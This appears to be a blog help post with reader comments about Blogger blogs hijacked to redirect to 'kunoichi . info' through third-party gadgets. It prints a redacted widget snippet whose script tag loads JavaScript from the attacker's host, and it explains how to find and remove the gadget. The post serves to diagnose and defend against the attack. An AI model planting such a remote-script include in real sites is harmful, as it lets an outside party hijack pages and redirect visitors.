In the latest round of blog hijacks, from misbehaving or miswritten accessory gadgets, we have reports this month in Blogger Help Forum: Something Is Broken about blogs redirecting to "kunoichi . info".
If we use a text only browser, such as an HTTP trace utility, the offending code is directly visible. Here's an example, taken from the latest forum problem report (and rigourously redacted).
So far, identification and removal, of the problem code, seems to be straightforward - just access the "Page Elements" wizard (Classic Blogger GUI) or the "Layout" menu wizard (New Blogger GUI), find the offending gadget, and remove it. As always, you are advised to clear cache and restart the browser, after removal and before testing.
>> Top
My Blogger site, xxxxxxx . blogspot . com, with over 8 years of blog posts archived, has been redirected without my permission, to "kunoichi . info". I see my blog for a few seconds before it goes to the new site.
If we use a text only browser, such as an HTTP trace utility, the offending code is directly visible. Here's an example, taken from the latest forum problem report (and rigourously redacted).
<div class='widget HTML' id='HTML2'>
<h2 class='title'>Recent Comments</h2>
<div class='widget-content'>
<script style="text/javascript" src="http : // kunoichi . info / blogger _ buster / comments.js"></script><script style="text/javascript">var a_rc=5;var m_rc=true;var n_rc=true;var o_rc=100;</script><script src="http : // xxxxxxx . blogspot . com /feeds/comments/default?alt=json-in-script&callback=showrecentcomments"></script>
So far, identification and removal, of the problem code, seems to be straightforward - just access the "Page Elements" wizard (Classic Blogger GUI) or the "Layout" menu wizard (New Blogger GUI), find the offending gadget, and remove it. As always, you are advised to clear cache and restart the browser, after removal and before testing.
>> Top
Comments
Your solution worked, and all is now well. What I would like to know is, how did the code get in there in the first place?
In any case, thanks for the solution!
Jennifer
You probably deleted a very useful sounding gadget - typically the problem will be in "Recent Comments" / "Recent Posts" or maybe "Daily Calendar". When initially installed, the gadget will work just fine.
What the hacker did is write the code, that you installed on your blog, so it references his personal code library. After his hacked gadgets had been installed by thousands of blog owners, the hacker updated his code, and it now redirects to "kunoichi . info".
In a similar case, the hacker is advising people to read his blog. The article on his blog instructs people to remove the "bad" gadgets, and get updated gadgets from his personal library - not Google hosted.
In effect, this guy is using the Google code library to advertise his personal expertise as a hacker.
We have had this exploit twice, in the past. The first time, it took us like 6 months before we noticed a pattern - and we had hundreds of problem reports in the forums, when the gadgets matured. The second time, we knew what to look for - and this time, we were ready for the attack.
http://blogging.nitecruzr.net/search/label/Blog%20Hijack%20-%202010
In my case, it was "Recent Comments," so I had wondered if someone had left the code in a comment, which was then displayed on the page, causing the problem.
Your explanation makes more sense, though - for the text of a comment to be able to hijack a blog would be a pretty big security hole!
In any case, it's gone and now I know it won't happen again. Thanks!
You will be at the end of a very long line.